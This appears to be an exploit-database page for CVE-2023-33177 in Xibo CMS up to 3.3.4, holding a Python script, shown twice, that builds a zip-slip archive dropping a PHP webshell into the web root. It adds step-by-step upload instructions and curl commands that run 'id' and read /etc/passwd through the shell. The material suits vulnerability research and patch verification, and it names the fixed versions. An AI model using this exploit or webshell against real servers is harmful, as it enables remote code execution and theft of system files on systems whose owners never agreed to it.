8.8
/ 10
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description
XiboCMS version 3.3.4 zip slip exploit that leverages path traversal and arbitrary file upload vulnerabilities to achieve code execution...
Basic Information
ID
PACKETSTORM:218663
Published
Apr 10, 2026 at 00:00
Affected Product
Affected Versions
# Exploit Title: XiboCMS 3.3.4- Remote Code Execution
# Google Dork: N/A
# Date: 2025-11-18
# Exploit Author: complexusprada
# Vendor Homepage: https://xibo.org.uk/
# Software Link: https://github.com/xibosignage/xibo-cms
# Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4
# Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4
# CVE: CVE-2023-33177
# GHSA: GHSA-jj27-x85q-crqv
# Category: webapps
"""
# Vulnerability Description:
# Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import
# functionality. The application fails to properly validate file paths in the mapping.json
# file within uploaded ZIP archives, allowing authenticated attackers to write files
# outside the intended library directory using path traversal sequences (../../).
# This results in arbitrary file upload and remote code execution.
# Exploitation Details:
# 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure
# 2. The mapping.json file contains a path traversal payload (../../web/shell.php)
# 3. A PHP webshell is placed at the corresponding path within the ZIP structure
# 4. When the layout is imported, Xibo extracts files without proper path validation
# 5. The webshell is written to the web root (/var/www/cms/web/shell.php)
# 6. Attacker gains remote code execution via the webshell
# Vulnerability Chain:
# ZIP contains: library/../../web/shell.php
# Mapping.json: {"file": "../../web/shell.php", ...}
# Xibo reads: library/ + ../../web/shell.php
# Xibo writes: /var/www/cms/library/temp/ + ../../web/shell.php
# Result: /var/www/cms/web/shell.php (webshell in web root!)
# Prerequisites:
# - Valid Xibo CMS credentials (any authenticated user with layout import permission)
# - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4
# Exploitation Steps:
# 1. Run this script to generate exploit.zip
# 2. Log in to Xibo CMS
# 3. Navigate to: Design → Layouts → Import
# 4. Upload the generated exploit.zip file
# 5. Even if JSON errors occur, the webshell has been written to disk
# 6. Access webshell at: http://<target>/shell.php?cmd=<command>
# Example: curl 'http://target/shell.php?cmd=id'
# Mitigation:
# Upgrade to patched versions:
# - Xibo CMS 2.3.17+ (for 2.x branch)
# - Xibo CMS 3.3.5+ (for 3.x branch)
# Disclaimer:
# This exploit is provided for educational purposes, authorized penetration testing,
# and vulnerability research only. Only use against systems you own or have explicit
# written permission to test.
"""
import zipfile
import json
import sys
def create_exploit():
"""Generate the malicious ZIP file for Xibo CMS RCE exploit"""
print("[*] Xibo CMS Zip Slip RCE Exploit Generator")
print("[*] CVE-2023-33177 - Path Traversal via Layout Import")
print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4\n")
# Valid Xibo 3.0 layout structure
# This ensures the ZIP passes initial validation checks
layout_json = {
"layout": "Exploit Layout",
"description": "Path Traversal Test",
"layoutDefinitions": {
"schemaVersion": 3,
"width": 1920,
"height": 1080,
"backgroundColor": "#000000",
"backgroundzIndex": 0,
"code": "CVE-2023-33177",
"actions": [],
"regions": [],
"drawers": []
}
}
# Empty playlist - triggers JSON import code path
playlist_json = {}
# VULNERABILITY: Path traversal in mapping.json
# The 'file' field is not properly sanitized before file extraction
# Xibo constructs the extraction path as: library/temp/ + file['file']
# Using ../../ allows escaping the library directory
mapping_json = [{
"file": "../../web/shell.php", # Path traversal payload
"name": "shell.php",
"type": "module"
}]
# Simple PHP webshell for command execution
# Accepts commands via GET parameter: ?cmd=<command>
webshell = b'<?php system($_GET["cmd"]); ?>'
# Create the malicious ZIP file
try:
with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
# Add required Xibo layout files
zf.writestr('layout.json', json.dumps(layout_json, indent=2))
zf.writestr('playlist.json', json.dumps(playlist_json))
zf.writestr('mapping.json', json.dumps(mapping_json))
# CRITICAL: The file path in the ZIP must match what Xibo expects
# Xibo calls: $zip->getStream('library/' . $file['file'])
# Therefore we place the file at: library/../../web/shell.php
zf.writestr('library/../../web/shell.php', webshell)
print("[+] Exploit ZIP created successfully: exploit.zip")
print("\n[*] Exploitation Steps:")
print(" 1. Log in to Xibo CMS with valid credentials")
print(" 2. Navigate to: Design → Layouts → Import")
print(" 3. Upload exploit.zip")
print(" 4. Ignore any JSON errors (file is already written)")
print(" 5. Access webshell: http://<target>/shell.php?cmd=<command>")
print("\n[*] Example:")
print(" curl 'http://target/shell.php?cmd=id'")
print(" curl 'http://target/shell.php?cmd=cat%20/etc/passwd'")
print()
except Exception as e:
print(f"[-] Error creating exploit: {e}", file=sys.stderr)
sys.exit(1)
if __name__ == "__main__":
create_exploit()
# Google Dork: N/A
# Date: 2025-11-18
# Exploit Author: complexusprada
# Vendor Homepage: https://xibo.org.uk/
# Software Link: https://github.com/xibosignage/xibo-cms
# Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4
# Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4
# CVE: CVE-2023-33177
# GHSA: GHSA-jj27-x85q-crqv
# Category: webapps
"""
# Vulnerability Description:
# Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import
# functionality. The application fails to properly validate file paths in the mapping.json
# file within uploaded ZIP archives, allowing authenticated attackers to write files
# outside the intended library directory using path traversal sequences (../../).
# This results in arbitrary file upload and remote code execution.
# Exploitation Details:
# 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure
# 2. The mapping.json file contains a path traversal payload (../../web/shell.php)
# 3. A PHP webshell is placed at the corresponding path within the ZIP structure
# 4. When the layout is imported, Xibo extracts files without proper path validation
# 5. The webshell is written to the web root (/var/www/cms/web/shell.php)
# 6. Attacker gains remote code execution via the webshell
# Vulnerability Chain:
# ZIP contains: library/../../web/shell.php
# Mapping.json: {"file": "../../web/shell.php", ...}
# Xibo reads: library/ + ../../web/shell.php
# Xibo writes: /var/www/cms/library/temp/ + ../../web/shell.php
# Result: /var/www/cms/web/shell.php (webshell in web root!)
# Prerequisites:
# - Valid Xibo CMS credentials (any authenticated user with layout import permission)
# - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4
# Exploitation Steps:
# 1. Run this script to generate exploit.zip
# 2. Log in to Xibo CMS
# 3. Navigate to: Design → Layouts → Import
# 4. Upload the generated exploit.zip file
# 5. Even if JSON errors occur, the webshell has been written to disk
# 6. Access webshell at: http://<target>/shell.php?cmd=<command>
# Example: curl 'http://target/shell.php?cmd=id'
# Mitigation:
# Upgrade to patched versions:
# - Xibo CMS 2.3.17+ (for 2.x branch)
# - Xibo CMS 3.3.5+ (for 3.x branch)
# Disclaimer:
# This exploit is provided for educational purposes, authorized penetration testing,
# and vulnerability research only. Only use against systems you own or have explicit
# written permission to test.
"""
import zipfile
import json
import sys
def create_exploit():
"""Generate the malicious ZIP file for Xibo CMS RCE exploit"""
print("[*] Xibo CMS Zip Slip RCE Exploit Generator")
print("[*] CVE-2023-33177 - Path Traversal via Layout Import")
print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4\n")
# Valid Xibo 3.0 layout structure
# This ensures the ZIP passes initial validation checks
layout_json = {
"layout": "Exploit Layout",
"description": "Path Traversal Test",
"layoutDefinitions": {
"schemaVersion": 3,
"width": 1920,
"height": 1080,
"backgroundColor": "#000000",
"backgroundzIndex": 0,
"code": "CVE-2023-33177",
"actions": [],
"regions": [],
"drawers": []
}
}
# Empty playlist - triggers JSON import code path
playlist_json = {}
# VULNERABILITY: Path traversal in mapping.json
# The 'file' field is not properly sanitized before file extraction
# Xibo constructs the extraction path as: library/temp/ + file['file']
# Using ../../ allows escaping the library directory
mapping_json = [{
"file": "../../web/shell.php", # Path traversal payload
"name": "shell.php",
"type": "module"
}]
# Simple PHP webshell for command execution
# Accepts commands via GET parameter: ?cmd=<command>
webshell = b'<?php system($_GET["cmd"]); ?>'
# Create the malicious ZIP file
try:
with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
# Add required Xibo layout files
zf.writestr('layout.json', json.dumps(layout_json, indent=2))
zf.writestr('playlist.json', json.dumps(playlist_json))
zf.writestr('mapping.json', json.dumps(mapping_json))
# CRITICAL: The file path in the ZIP must match what Xibo expects
# Xibo calls: $zip->getStream('library/' . $file['file'])
# Therefore we place the file at: library/../../web/shell.php
zf.writestr('library/../../web/shell.php', webshell)
print("[+] Exploit ZIP created successfully: exploit.zip")
print("\n[*] Exploitation Steps:")
print(" 1. Log in to Xibo CMS with valid credentials")
print(" 2. Navigate to: Design → Layouts → Import")
print(" 3. Upload exploit.zip")
print(" 4. Ignore any JSON errors (file is already written)")
print(" 5. Access webshell: http://<target>/shell.php?cmd=<command>")
print("\n[*] Example:")
print(" curl 'http://target/shell.php?cmd=id'")
print(" curl 'http://target/shell.php?cmd=cat%20/etc/passwd'")
print()
except Exception as e:
print(f"[-] Error creating exploit: {e}", file=sys.stderr)
sys.exit(1)
if __name__ == "__main__":
create_exploit()